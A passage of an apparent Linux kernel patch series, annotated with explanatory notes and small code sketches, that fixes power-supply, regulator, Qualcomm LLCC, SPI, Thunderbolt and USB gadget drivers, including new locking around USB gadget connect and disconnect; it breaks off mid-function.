+ 	{ KE_KEY, 0x7E, { KEY_BLUETOOTH } }, /* Bluetooth Disable */
+@@ -584,6 +585,7 @@ static const struct key_entry asus_nb_wmi_keymap[] = {
+ 	{ KE_KEY, 0xAE, { KEY_FN_F5 } }, /* Fn+F5 fan mode on 2020+ */
+ 	{ KE_KEY, 0xB3, { KEY_PROG4 } }, /* AURA */
+ 	{ KE_KEY, 0xB5, { KEY_CALC } },
++	{ KE_IGNORE, 0xC0, }, /* External display connect/disconnect notification */
+ 	{ KE_KEY, 0xC4, { KEY_KBDILLUMUP } },
+ 	{ KE_KEY, 0xC5, { KEY_KBDILLUMDOWN } },
+ 	{ KE_IGNORE, 0xC6, },  /* Ambient Light Sensor notification */
+diff --git a/drivers/power/supply/ab8500_btemp.c b/drivers/power/supply/ab8500_btemp.c
+index 307ee6f71042e..6f83e99d2eb72 100644
+--- a/drivers/power/supply/ab8500_btemp.c
++++ b/drivers/power/supply/ab8500_btemp.c
+@@ -624,10 +624,8 @@ static int ab8500_btemp_get_ext_psy_data(struct device *dev, void *data)
+  */
+ static void ab8500_btemp_external_power_changed(struct power_supply *psy)
+ {
+-	struct ab8500_btemp *di = power_supply_get_drvdata(psy);
+-
+-	class_for_each_device(power_supply_class, NULL,
+-		di->btemp_psy, ab8500_btemp_get_ext_psy_data);
++	class_for_each_device(power_supply_class, NULL, psy,
++			      ab8500_btemp_get_ext_psy_data);
+ }
+ 
+ /* ab8500 btemp driver interrupts and their respective isr */
+diff --git a/drivers/power/supply/ab8500_fg.c b/drivers/power/supply/ab8500_fg.c
+index c6c9804280dbe..71ce28eed463f 100644
+--- a/drivers/power/supply/ab8500_fg.c
++++ b/drivers/power/supply/ab8500_fg.c
+@@ -2407,10 +2407,8 @@ out:
+  */
+ static void ab8500_fg_external_power_changed(struct power_supply *psy)
+ {
+-	struct ab8500_fg *di = power_supply_get_drvdata(psy);
+-
+-	class_for_each_device(power_supply_class, NULL,
+-		di->fg_psy, ab8500_fg_get_ext_psy_data);
++	class_for_each_device(power_supply_class, NULL, psy,
++			      ab8500_fg_get_ext_psy_data);
+ }
+ 
+ /**
+diff --git a/drivers/power/supply/bq27xxx_battery.c b/drivers/power/supply/bq27xxx_battery.c
+index 17a09d103a59c..4a5371a3a5313 100644
+--- a/drivers/power/supply/bq27xxx_battery.c
++++ b/drivers/power/supply/bq27xxx_battery.c
+@@ -1083,10 +1083,8 @@ static int poll_interval_param_set(const char *val, const struct kernel_param *k
+ 		return ret;
+ 
+ 	mutex_lock(&bq27xxx_list_lock);
+-	list_for_each_entry(di, &bq27xxx_battery_devices, list) {
+-		cancel_delayed_work_sync(&di->work);
+-		schedule_delayed_work(&di->work, 0);
+-	}
++	list_for_each_entry(di, &bq27xxx_battery_devices, list)
++		mod_delayed_work(system_wq, &di->work, 0);
+ 	mutex_unlock(&bq27xxx_list_lock);
+ 
+ 	return ret;
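
The bq27xxx change above swaps a cancel/reschedule pair for a single
mod_delayed_work() call. That is both shorter and safer:
cancel_delayed_work_sync() can block (or deadlock under a lock the work
item also takes), while mod_delayed_work() just re-arms the timer
atomically. A minimal sketch of the pattern, assuming only the standard
workqueue API:

#include <linux/workqueue.h>

/* Instead of:
 *	cancel_delayed_work_sync(dw);
 *	schedule_delayed_work(dw, 0);
 * re-arm in one step; a running instance is left alone and the work
 * is (re)queued to run immediately.
 */
static void kick_poll_now(struct delayed_work *dw)
{
	mod_delayed_work(system_wq, dw, 0);
}
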
+diff --git a/drivers/power/supply/power_supply_core.c b/drivers/power/supply/power_supply_core.c
+index 8382be867d274..7871ab5e979c0 100644
+--- a/drivers/power/supply/power_supply_core.c
++++ b/drivers/power/supply/power_supply_core.c
+@@ -348,6 +348,10 @@ static int __power_supply_is_system_supplied(struct device *dev, void *data)
+ 	struct power_supply *psy = dev_get_drvdata(dev);
+ 	unsigned int *count = data;
+ 
++	if (!psy->desc->get_property(psy, POWER_SUPPLY_PROP_SCOPE, &ret))
++		if (ret.intval == POWER_SUPPLY_SCOPE_DEVICE)
++			return 0;
++
+ 	(*count)++;
+ 	if (psy->desc->type != POWER_SUPPLY_TYPE_BATTERY)
+ 		if (!psy->desc->get_property(psy, POWER_SUPPLY_PROP_ONLINE,
+@@ -366,8 +370,8 @@ int power_supply_is_system_supplied(void)
+ 				      __power_supply_is_system_supplied);
+ 
+ 	/*
+-	 * If no power class device was found at all, most probably we are
+-	 * running on a desktop system, so assume we are on mains power.
++	 * If no system scope power class device was found at all, most probably we
++	 * are running on a desktop system, so assume we are on mains power.
+ 	 */
+ 	if (count == 0)
+ 		return 1;
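
With the scope check above, a supply that powers a peripheral rather
than the system no longer counts toward "system supplied". A hedged
sketch of the driver side, with illustrative names around the real
POWER_SUPPLY_* constants:

#include <linux/power_supply.h>

static int example_get_property(struct power_supply *psy,
				enum power_supply_property psp,
				union power_supply_propval *val)
{
	switch (psp) {
	case POWER_SUPPLY_PROP_SCOPE:
		/* e.g. a wireless-peripheral battery */
		val->intval = POWER_SUPPLY_SCOPE_DEVICE;
		return 0;
	default:
		return -EINVAL;
	}
}
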
+diff --git a/drivers/power/supply/power_supply_sysfs.c b/drivers/power/supply/power_supply_sysfs.c
+index 5369abaceb5cc..7abd916d005a6 100644
+--- a/drivers/power/supply/power_supply_sysfs.c
++++ b/drivers/power/supply/power_supply_sysfs.c
+@@ -285,7 +285,8 @@ static ssize_t power_supply_show_property(struct device *dev,
+ 
+ 		if (ret < 0) {
+ 			if (ret == -ENODATA)
+-				dev_dbg(dev, "driver has no data for `%s' property\n",
++				dev_dbg_ratelimited(dev,
++					"driver has no data for `%s' property\n",
+ 					attr->attr.name);
+ 			else if (ret != -ENODEV && ret != -EAGAIN)
+ 				dev_err_ratelimited(dev,
+diff --git a/drivers/power/supply/sc27xx_fuel_gauge.c b/drivers/power/supply/sc27xx_fuel_gauge.c
+index 632977f84b954..bd23c4d9fed43 100644
+--- a/drivers/power/supply/sc27xx_fuel_gauge.c
++++ b/drivers/power/supply/sc27xx_fuel_gauge.c
+@@ -733,13 +733,6 @@ static int sc27xx_fgu_set_property(struct power_supply *psy,
+ 	return ret;
+ }
+ 
+-static void sc27xx_fgu_external_power_changed(struct power_supply *psy)
+-{
+-	struct sc27xx_fgu_data *data = power_supply_get_drvdata(psy);
+-
+-	power_supply_changed(data->battery);
+-}
+-
+ static int sc27xx_fgu_property_is_writeable(struct power_supply *psy,
+ 					    enum power_supply_property psp)
+ {
+@@ -774,7 +767,7 @@ static const struct power_supply_desc sc27xx_fgu_desc = {
+ 	.num_properties		= ARRAY_SIZE(sc27xx_fgu_props),
+ 	.get_property		= sc27xx_fgu_get_property,
+ 	.set_property		= sc27xx_fgu_set_property,
+-	.external_power_changed	= sc27xx_fgu_external_power_changed,
++	.external_power_changed	= power_supply_changed,
+ 	.property_is_writeable	= sc27xx_fgu_property_is_writeable,
+ 	.no_thermal		= true,
+ };
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index c417eae887b2d..e01cade8be0c7 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -5257,7 +5257,7 @@ static void rdev_init_debugfs(struct regulator_dev *rdev)
+ 	}
+ 
+ 	rdev->debugfs = debugfs_create_dir(rname, debugfs_root);
+-	if (!rdev->debugfs) {
++	if (IS_ERR(rdev->debugfs)) {
+ 		rdev_warn(rdev, "Failed to create debugfs directory\n");
+ 		return;
+ 	}
+@@ -6179,7 +6179,7 @@ static int __init regulator_init(void)
+ 	ret = class_register(&regulator_class);
+ 
+ 	debugfs_root = debugfs_create_dir("regulator", NULL);
+-	if (!debugfs_root)
++	if (IS_ERR(debugfs_root))
+ 		pr_warn("regulator: Failed to create debugfs directory\n");
+ 
+ #ifdef CONFIG_DEBUG_FS
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index d4cba3b3c56c4..85219b5e1f416 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -50,8 +50,6 @@
+ #define LLCC_TRP_WRSC_EN              0x21f20
+ #define LLCC_TRP_WRSC_CACHEABLE_EN    0x21f2c
+ 
+-#define BANK_OFFSET_STRIDE	      0x80000
+-
+ #define LLCC_VERSION_2_0_0_0          0x02000000
+ #define LLCC_VERSION_2_1_0_0          0x02010000
+ 
+@@ -749,8 +747,8 @@ static int qcom_llcc_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static struct regmap *qcom_llcc_init_mmio(struct platform_device *pdev,
+-		const char *name)
++static struct regmap *qcom_llcc_init_mmio(struct platform_device *pdev, u8 index,
++					  const char *name)
+ {
+ 	void __iomem *base;
+ 	struct regmap_config llcc_regmap_config = {
+@@ -760,7 +758,7 @@ static struct regmap *qcom_llcc_init_mmio(struct platform_device *pdev,
+ 		.fast_io = true,
+ 	};
+ 
+-	base = devm_platform_ioremap_resource_byname(pdev, name);
++	base = devm_platform_ioremap_resource(pdev, index);
+ 	if (IS_ERR(base))
+ 		return ERR_CAST(base);
+ 
+@@ -778,6 +776,7 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 	const struct llcc_slice_config *llcc_cfg;
+ 	u32 sz;
+ 	u32 version;
++	struct regmap *regmap;
+ 
+ 	drv_data = devm_kzalloc(dev, sizeof(*drv_data), GFP_KERNEL);
+ 	if (!drv_data) {
+@@ -785,21 +784,51 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 		goto err;
+ 	}
+ 
+-	drv_data->regmap = qcom_llcc_init_mmio(pdev, "llcc_base");
+-	if (IS_ERR(drv_data->regmap)) {
+-		ret = PTR_ERR(drv_data->regmap);
++	/* Initialize the first LLCC bank regmap */
++	regmap = qcom_llcc_init_mmio(pdev, 0, "llcc0_base");
++	if (IS_ERR(regmap)) {
++		ret = PTR_ERR(regmap);
+ 		goto err;
+ 	}
+ 
+-	drv_data->bcast_regmap =
+-		qcom_llcc_init_mmio(pdev, "llcc_broadcast_base");
++	cfg = of_device_get_match_data(&pdev->dev);
++
++	ret = regmap_read(regmap, cfg->reg_offset[LLCC_COMMON_STATUS0], &num_banks);
++	if (ret)
++		goto err;
++
++	num_banks &= LLCC_LB_CNT_MASK;
++	num_banks >>= LLCC_LB_CNT_SHIFT;
++	drv_data->num_banks = num_banks;
++
++	drv_data->regmaps = devm_kcalloc(dev, num_banks, sizeof(*drv_data->regmaps), GFP_KERNEL);
++	if (!drv_data->regmaps) {
++		ret = -ENOMEM;
++		goto err;
++	}
++
++	drv_data->regmaps[0] = regmap;
++
++	/* Initialize rest of LLCC bank regmaps */
++	for (i = 1; i < num_banks; i++) {
++		char *base = kasprintf(GFP_KERNEL, "llcc%d_base", i);
++
++		drv_data->regmaps[i] = qcom_llcc_init_mmio(pdev, i, base);
++		if (IS_ERR(drv_data->regmaps[i])) {
++			ret = PTR_ERR(drv_data->regmaps[i]);
++			kfree(base);
++			goto err;
++		}
++
++		kfree(base);
++	}
++
++	drv_data->bcast_regmap = qcom_llcc_init_mmio(pdev, i, "llcc_broadcast_base");
+ 	if (IS_ERR(drv_data->bcast_regmap)) {
+ 		ret = PTR_ERR(drv_data->bcast_regmap);
+ 		goto err;
+ 	}
+ 
+-	cfg = of_device_get_match_data(&pdev->dev);
+-
+ 	/* Extract version of the IP */
+ 	ret = regmap_read(drv_data->bcast_regmap, cfg->reg_offset[LLCC_COMMON_HW_INFO],
+ 			  &version);
+@@ -808,15 +837,6 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 
+ 	drv_data->version = version;
+ 
+-	ret = regmap_read(drv_data->regmap, cfg->reg_offset[LLCC_COMMON_STATUS0],
+-			  &num_banks);
+-	if (ret)
+-		goto err;
+-
+-	num_banks &= LLCC_LB_CNT_MASK;
+-	num_banks >>= LLCC_LB_CNT_SHIFT;
+-	drv_data->num_banks = num_banks;
+-
+ 	llcc_cfg = cfg->sct_data;
+ 	sz = cfg->size;
+ 
+@@ -824,16 +844,6 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 		if (llcc_cfg[i].slice_id > drv_data->max_slices)
+ 			drv_data->max_slices = llcc_cfg[i].slice_id;
+ 
+-	drv_data->offsets = devm_kcalloc(dev, num_banks, sizeof(u32),
+-							GFP_KERNEL);
+-	if (!drv_data->offsets) {
+-		ret = -ENOMEM;
+-		goto err;
+-	}
+-
+-	for (i = 0; i < num_banks; i++)
+-		drv_data->offsets[i] = i * BANK_OFFSET_STRIDE;
+-
+ 	drv_data->bitmap = devm_bitmap_zalloc(dev, drv_data->max_slices,
+ 					      GFP_KERNEL);
+ 	if (!drv_data->bitmap) {
+diff --git a/drivers/spi/spi-cadence-quadspi.c b/drivers/spi/spi-cadence-quadspi.c
+index 30fd4bc90580e..b371e4eb41ec3 100644
+--- a/drivers/spi/spi-cadence-quadspi.c
++++ b/drivers/spi/spi-cadence-quadspi.c
+@@ -1697,8 +1697,11 @@ static int cqspi_probe(struct platform_device *pdev)
+ 			cqspi->slow_sram = true;
+ 
+ 		if (of_device_is_compatible(pdev->dev.of_node,
+-					    "xlnx,versal-ospi-1.0"))
+-			dma_set_mask(&pdev->dev, DMA_BIT_MASK(64));
++					    "xlnx,versal-ospi-1.0")) {
++			ret = dma_set_mask(&pdev->dev, DMA_BIT_MASK(64));
++			if (ret)
++				goto probe_reset_failed;
++		}
+ 	}
+ 
+ 	ret = devm_request_irq(dev, irq, cqspi_irq_handler, 0,
+diff --git a/drivers/spi/spi-fsl-dspi.c b/drivers/spi/spi-fsl-dspi.c
+index a33e547b7d395..01930b52c4fb8 100644
+--- a/drivers/spi/spi-fsl-dspi.c
++++ b/drivers/spi/spi-fsl-dspi.c
+@@ -975,7 +975,9 @@ static int dspi_transfer_one_message(struct spi_controller *ctlr,
+ static int dspi_setup(struct spi_device *spi)
+ {
+ 	struct fsl_dspi *dspi = spi_controller_get_devdata(spi->controller);
++	u32 period_ns = DIV_ROUND_UP(NSEC_PER_SEC, spi->max_speed_hz);
+ 	unsigned char br = 0, pbr = 0, pcssck = 0, cssck = 0;
++	u32 quarter_period_ns = DIV_ROUND_UP(period_ns, 4);
+ 	u32 cs_sck_delay = 0, sck_cs_delay = 0;
+ 	struct fsl_dspi_platform_data *pdata;
+ 	unsigned char pasc = 0, asc = 0;
+@@ -1003,6 +1005,19 @@ static int dspi_setup(struct spi_device *spi)
+ 		sck_cs_delay = pdata->sck_cs_delay;
+ 	}
+ 
++	/* Since tCSC and tASC apply to continuous transfers too, avoid SCK
++	 * glitches of half a cycle by never allowing tCSC + tASC to go below
++	 * half a SCK period.
++	 */
++	if (cs_sck_delay < quarter_period_ns)
++		cs_sck_delay = quarter_period_ns;
++	if (sck_cs_delay < quarter_period_ns)
++		sck_cs_delay = quarter_period_ns;
++
++	dev_dbg(&spi->dev,
++		"DSPI controller timing params: CS-to-SCK delay %u ns, SCK-to-CS delay %u ns\n",
++		cs_sck_delay, sck_cs_delay);
++
+ 	clkrate = clk_get_rate(dspi->clk);
+ 	hz_to_spi_baud(&pbr, &br, spi->max_speed_hz, clkrate);
+ 
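
A worked example of the clamp introduced above, for a transfer with
spi->max_speed_hz = 10 MHz:

	period_ns         = DIV_ROUND_UP(1000000000, 10000000) = 100
	quarter_period_ns = DIV_ROUND_UP(100, 4)               = 25

so cs_sck_delay and sck_cs_delay are each raised to at least 25 ns,
guaranteeing tCSC + tASC >= 50 ns, i.e. never less than half the 100 ns
SCK period.
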
+diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c
+index 86adff2a86edd..687adc9e086ca 100644
+--- a/drivers/target/target_core_transport.c
++++ b/drivers/target/target_core_transport.c
+@@ -504,6 +504,8 @@ target_setup_session(struct se_portal_group *tpg,
+ 
+ free_sess:
+ 	transport_free_session(sess);
++	return ERR_PTR(rc);
++
+ free_cnt:
+ 	target_free_cmd_counter(cmd_cnt);
+ 	return ERR_PTR(rc);
+diff --git a/drivers/thunderbolt/dma_test.c b/drivers/thunderbolt/dma_test.c
+index 3bedecb236e0d..14bb6dec6c4b0 100644
+--- a/drivers/thunderbolt/dma_test.c
++++ b/drivers/thunderbolt/dma_test.c
+@@ -192,9 +192,9 @@ static int dma_test_start_rings(struct dma_test *dt)
+ 	}
+ 
+ 	ret = tb_xdomain_enable_paths(dt->xd, dt->tx_hopid,
+-				      dt->tx_ring ? dt->tx_ring->hop : 0,
++				      dt->tx_ring ? dt->tx_ring->hop : -1,
+ 				      dt->rx_hopid,
+-				      dt->rx_ring ? dt->rx_ring->hop : 0);
++				      dt->rx_ring ? dt->rx_ring->hop : -1);
+ 	if (ret) {
+ 		dma_test_free_rings(dt);
+ 		return ret;
+@@ -218,9 +218,9 @@ static void dma_test_stop_rings(struct dma_test *dt)
+ 		tb_ring_stop(dt->tx_ring);
+ 
+ 	ret = tb_xdomain_disable_paths(dt->xd, dt->tx_hopid,
+-				       dt->tx_ring ? dt->tx_ring->hop : 0,
++				       dt->tx_ring ? dt->tx_ring->hop : -1,
+ 				       dt->rx_hopid,
+-				       dt->rx_ring ? dt->rx_ring->hop : 0);
++				       dt->rx_ring ? dt->rx_ring->hop : -1);
+ 	if (ret)
+ 		dev_warn(&dt->svc->dev, "failed to disable DMA paths\n");
+ 
+diff --git a/drivers/thunderbolt/nhi.c b/drivers/thunderbolt/nhi.c
+index 0a525f44ea316..4a6a3802d7e51 100644
+--- a/drivers/thunderbolt/nhi.c
++++ b/drivers/thunderbolt/nhi.c
+@@ -56,9 +56,14 @@ static int ring_interrupt_index(const struct tb_ring *ring)
+ 
+ static void nhi_mask_interrupt(struct tb_nhi *nhi, int mask, int ring)
+ {
+-	if (nhi->quirks & QUIRK_AUTO_CLEAR_INT)
+-		return;
+-	iowrite32(mask, nhi->iobase + REG_RING_INTERRUPT_MASK_CLEAR_BASE + ring);
++	if (nhi->quirks & QUIRK_AUTO_CLEAR_INT) {
++		u32 val;
++
++		val = ioread32(nhi->iobase + REG_RING_INTERRUPT_BASE + ring);
++		iowrite32(val & ~mask, nhi->iobase + REG_RING_INTERRUPT_BASE + ring);
++	} else {
++		iowrite32(mask, nhi->iobase + REG_RING_INTERRUPT_MASK_CLEAR_BASE + ring);
++	}
+ }
+ 
+ static void nhi_clear_interrupt(struct tb_nhi *nhi, int ring)
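
On controllers with QUIRK_AUTO_CLEAR_INT the fix above stops skipping
the mask entirely and instead clears the enable bits by
read-modify-write of REG_RING_INTERRUPT_BASE. A generic sketch of that
MMIO pattern (the register layout here is illustrative, not the NHI's):

#include <linux/io.h>

static void mmio_mask_bits(void __iomem *reg, u32 mask)
{
	u32 val = ioread32(reg);

	/* clear the enable bits covered by @mask, keep the rest */
	iowrite32(val & ~mask, reg);
}
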
+diff --git a/drivers/thunderbolt/tb.c b/drivers/thunderbolt/tb.c
+index 3f1ab30c4fb15..e1eb092ad1d67 100644
+--- a/drivers/thunderbolt/tb.c
++++ b/drivers/thunderbolt/tb.c
+@@ -607,6 +607,7 @@ static void tb_scan_port(struct tb_port *port)
+ {
+ 	struct tb_cm *tcm = tb_priv(port->sw->tb);
+ 	struct tb_port *upstream_port;
++	bool discovery = false;
+ 	struct tb_switch *sw;
+ 	int ret;
+ 
+@@ -674,8 +675,10 @@ static void tb_scan_port(struct tb_port *port)
+ 	 * tunnels and know which switches were authorized already by
+ 	 * the boot firmware.
+ 	 */
+-	if (!tcm->hotplug_active)
++	if (!tcm->hotplug_active) {
+ 		dev_set_uevent_suppress(&sw->dev, true);
++		discovery = true;
++	}
+ 
+ 	/*
+ 	 * At the moment Thunderbolt 2 and beyond (devices with LC) we
+@@ -705,10 +708,14 @@ static void tb_scan_port(struct tb_port *port)
+ 	 * CL0s and CL1 are enabled and supported together.
+ 	 * Silently ignore CLx enabling in case CLx is not supported.
+ 	 */
+-	ret = tb_switch_enable_clx(sw, TB_CL1);
+-	if (ret && ret != -EOPNOTSUPP)
+-		tb_sw_warn(sw, "failed to enable %s on upstream port\n",
+-			   tb_switch_clx_name(TB_CL1));
++	if (discovery) {
++		tb_sw_dbg(sw, "discovery, not touching CL states\n");
++	} else {
++		ret = tb_switch_enable_clx(sw, TB_CL1);
++		if (ret && ret != -EOPNOTSUPP)
++			tb_sw_warn(sw, "failed to enable %s on upstream port\n",
++				   tb_switch_clx_name(TB_CL1));
++	}
+ 
+ 	if (tb_switch_is_clx_enabled(sw, TB_CL1))
+ 		/*
+diff --git a/drivers/tty/serial/lantiq.c b/drivers/tty/serial/lantiq.c
+index c892f3c7d1abc..112a2f5f6ac3f 100644
+--- a/drivers/tty/serial/lantiq.c
++++ b/drivers/tty/serial/lantiq.c
+@@ -278,6 +278,7 @@ lqasc_err_int(int irq, void *_port)
+ 	struct ltq_uart_port *ltq_port = to_ltq_uart_port(port);
+ 
+ 	spin_lock_irqsave(&ltq_port->lock, flags);
++	__raw_writel(ASC_IRNCR_EIR, port->membase + LTQ_ASC_IRNCR);
+ 	/* clear any pending interrupts */
+ 	asc_update_bits(0, ASCWHBSTATE_CLRPE | ASCWHBSTATE_CLRFE |
+ 		ASCWHBSTATE_CLRROE, port->membase + LTQ_ASC_WHBSTATE);
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 9f8c988c25cb1..e999e6079ae03 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -1982,6 +1982,11 @@ static int dwc3_remove(struct platform_device *pdev)
+ 	pm_runtime_allow(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
++	/*
++	 * HACK: Clear the driver data, which is currently accessed by parent
++	 * glue drivers, before allowing the parent to suspend.
++	 */
++	platform_set_drvdata(pdev, NULL);
+ 	pm_runtime_set_suspended(&pdev->dev);
+ 
+ 	dwc3_free_event_buffers(dwc);
+diff --git a/drivers/usb/dwc3/dwc3-qcom.c b/drivers/usb/dwc3/dwc3-qcom.c
+index 959fc925ca7c5..79b22abf97276 100644
+--- a/drivers/usb/dwc3/dwc3-qcom.c
++++ b/drivers/usb/dwc3/dwc3-qcom.c
+@@ -308,7 +308,16 @@ static void dwc3_qcom_interconnect_exit(struct dwc3_qcom *qcom)
+ /* Only usable in contexts where the role can not change. */
+ static bool dwc3_qcom_is_host(struct dwc3_qcom *qcom)
+ {
+-	struct dwc3 *dwc = platform_get_drvdata(qcom->dwc3);
++	struct dwc3 *dwc;
++
++	/*
++	 * FIXME: Fix this layering violation.
++	 */
++	dwc = platform_get_drvdata(qcom->dwc3);
++
++	/* Core driver may not have probed yet. */
++	if (!dwc)
++		return false;
+ 
+ 	return dwc->xhci;
+ }
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 8cd0d919ef63d..7e94d31687e9e 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -180,6 +180,7 @@ static void dwc3_gadget_del_and_unmap_request(struct dwc3_ep *dep,
+ 	list_del(&req->list);
+ 	req->remaining = 0;
+ 	req->needs_extra_trb = false;
++	req->num_trbs = 0;
+ 
+ 	if (req->request.status == -EINPROGRESS)
+ 		req->request.status = status;
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index bf9878e1a72a8..99f40611f459b 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -37,6 +37,14 @@ static struct bus_type gadget_bus_type;
+  * @vbus: for udcs who care about vbus status, this value is real vbus status;
+  * for udcs who do not care about vbus status, this value is always true
+  * @started: the UDC's started state. True if the UDC had started.
++ * @allow_connect: Indicates whether UDC is allowed to be pulled up.
++ * Set/cleared by gadget_(un)bind_driver() after gadget driver is bound or
++ * unbound.
++ * @connect_lock: protects udc->started, gadget->connect,
++ * gadget->allow_connect and gadget->deactivate. The routines
++ * usb_gadget_connect_locked(), usb_gadget_disconnect_locked(),
++ * usb_udc_connect_control_locked(), usb_gadget_udc_start_locked() and
++ * usb_gadget_udc_stop_locked() are called with this lock held.
+  *
+  * This represents the internal data structure which is used by the UDC-class
+  * to hold information about udc driver and gadget together.
+@@ -48,6 +56,9 @@ struct usb_udc {
+ 	struct list_head		list;
+ 	bool				vbus;
+ 	bool				started;
++	bool				allow_connect;
++	struct work_struct		vbus_work;
++	struct mutex			connect_lock;
+ };
+ 
+ static struct class *udc_class;
+@@ -660,17 +671,8 @@ out:
+ }
+ EXPORT_SYMBOL_GPL(usb_gadget_vbus_disconnect);
+ 
+-/**
+- * usb_gadget_connect - software-controlled connect to USB host
+- * @gadget:the peripheral being connected
+- *
+- * Enables the D+ (or potentially D-) pullup.  The host will start
+- * enumerating this gadget when the pullup is active and a VBUS session
+- * is active (the link is powered).
+- *
+- * Returns zero on success, else negative errno.
+- */
+-int usb_gadget_connect(struct usb_gadget *gadget)
++static int usb_gadget_connect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -679,10 +681,12 @@ int usb_gadget_connect(struct usb_gadget *gadget)
+ 		goto out;
+ 	}
+ 
+-	if (gadget->deactivated) {
++	if (gadget->deactivated || !gadget->udc->allow_connect || !gadget->udc->started) {
+ 		/*
+-		 * If gadget is deactivated we only save new state.
+-		 * Gadget will be connected automatically after activation.
++		 * If the gadget isn't usable (because it is deactivated,
++		 * unbound, or not yet started), we only save the new state.
++		 * The gadget will be connected automatically when it is
++		 * activated/bound/started.
+ 		 */
+ 		gadget->connected = true;
+ 		goto out;
+@@ -697,22 +701,31 @@ out:
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL_GPL(usb_gadget_connect);
+ 
+ /**
+- * usb_gadget_disconnect - software-controlled disconnect from USB host
+- * @gadget:the peripheral being disconnected
+- *
+- * Disables the D+ (or potentially D-) pullup, which the host may see
+- * as a disconnect (when a VBUS session is active).  Not all systems
+- * support software pullup controls.
++ * usb_gadget_connect - software-controlled connect to USB host
++ * @gadget:the peripheral being connected
+  *
+- * Following a successful disconnect, invoke the ->disconnect() callback
+- * for the current gadget driver so that UDC drivers don't need to.
++ * Enables the D+ (or potentially D-) pullup.  The host will start
++ * enumerating this gadget when the pullup is active and a VBUS session
++ * is active (the link is powered).
+  *
+  * Returns zero on success, else negative errno.
+  */
+-int usb_gadget_disconnect(struct usb_gadget *gadget)
++int usb_gadget_connect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_connect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(usb_gadget_connect);
++
++static int usb_gadget_disconnect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -724,7 +737,7 @@ int usb_gadget_disconnect(struct usb_gadget *gadget)
+ 	if (!gadget->connected)
+ 		goto out;
+ 
+-	if (gadget->deactivated) {
++	if (gadget->deactivated || !gadget->udc->started) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will stay disconnected after activation.
+@@ -747,6 +760,30 @@ out:
+ 
+ 	return ret;
+ }
++
++/**
++ * usb_gadget_disconnect - software-controlled disconnect from USB host
++ * @gadget:the peripheral being disconnected
++ *
++ * Disables the D+ (or potentially D-) pullup, which the host may see
++ * as a disconnect (when a VBUS session is active).  Not all systems
++ * support software pullup controls.
++ *
++ * Following a successful disconnect, invoke the ->disconnect() callback
++ * for the current gadget driver so that UDC drivers don't need to.
++ *
++ * Returns zero on success, else negative errno.
++ */
++int usb_gadget_disconnect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_disconnect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(usb_gadget_disconnect);
+ 
+ /**
+@@ -764,13 +801,14 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ {
+ 	int ret = 0;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	if (gadget->deactivated)
+-		goto out;
++		goto unlock;
+ 
+ 	if (gadget->connected) {
+-		ret = usb_gadget_disconnect(gadget);
++		ret = usb_gadget_disconnect_locked(gadget);
+ 		if (ret)
+-			goto out;
++			goto unlock;
+ 
+ 		/*
+ 		 * If gadget was being connected before deactivation, we want
+@@ -780,7 +818,8 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	}
+ 	gadget->deactivated = true;
+ 
+-out:
++unlock:
++	mutex_unlock(&gadget->udc->connect_lock);
+ 	trace_usb_gadget_deactivate(gadget, ret);
+ 
+ 	return ret;
+@@ -800,8 +839,9 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ {
+ 	int ret = 0;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	if (!gadget->deactivated)
+-		goto out;
++		goto unlock;
+ 
+ 	gadget->deactivated = false;
+ 
+@@ -810,9 +850,10 @@
+ 	 * while it was being deactivated, we call usb_gadget_connect().
+ 	 */
+ 	if (gadget->connected)
+-		ret = usb_gadget_connect(gadget);
++		ret = usb_gadget_connect_locked(gadget);
+ 
+-out:
++unlock:
++	mutex_unlock(&gadget->udc->connect_lock);
+ 	trace_usb_gadget_activate(gadget, ret);
+ 
+ 	return ret;
+@@ -1051,12 +1093,22 @@ EXPORT_SYMBOL_GPL(usb_gadget_set_state);
+ 
+ /* ------------------------------------------------------------------------- */
+ 
+-static void usb_udc_connect_control(struct usb_udc *udc)
++/* Acquire connect_lock before calling this function. */
++static void usb_udc_connect_control_locked(struct usb_udc *udc) __must_hold(&udc->connect_lock)
+ {
+ 	if (udc->vbus)
